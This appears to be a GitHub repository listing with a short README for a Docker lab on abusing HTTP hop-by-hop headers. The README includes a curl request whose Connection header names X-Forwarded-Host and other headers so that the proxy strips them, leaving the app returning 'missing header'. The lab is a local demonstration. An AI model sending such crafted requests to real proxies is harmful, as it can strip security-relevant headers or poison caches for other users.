https://github.com/mrtc0/abusing-hop-by-hop-header
https://github.com/mrtc0/abusing-hop-by-hop-header
Last synced: about 2 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/mrtc0/abusing-hop-by-hop-header
- Owner: mrtc0
- Created: 2019-11-03T14:10:53.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2022-05-25T09:26:44.000Z (about 3 years ago)
- Last Synced: 2025-04-01T22:05:35.076Z (2 months ago)
- Language: Dockerfile
- Size: 8.79 KB
- Stars: 1
- Watchers: 3
- Forks: 1
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# abusing-hop-by-hop-header
# run
```shell
$ docker-compose run
```
# abusing
```shell
❯ curl 'http://localhost/?p=1'
[["Host", "app:3000"], ["User-Agent", "curl/7.54.0"], ["Accept", "*/*"], ["X-Forwarded-For", "172.21.0.1, 172.21.0.4"], ["Xxx", "yyy"], ["Accept-Encoding", "gzip"], ["X-Varnish", "3"], ["X-Forwarded-Host", "localhost"], ["X-Forwarded-Server", "172.21.0.3"], ["Connection", "Keep-Alive"]]
❯ curl 'http://localhost/?p=2' -H 'Connection: keep-alive, X-Forwarded-Host, X-Forwarded-Server, X-Varnish, xxx'
missing header
❯ curl 'http://localhost/?p=2'
missing header
```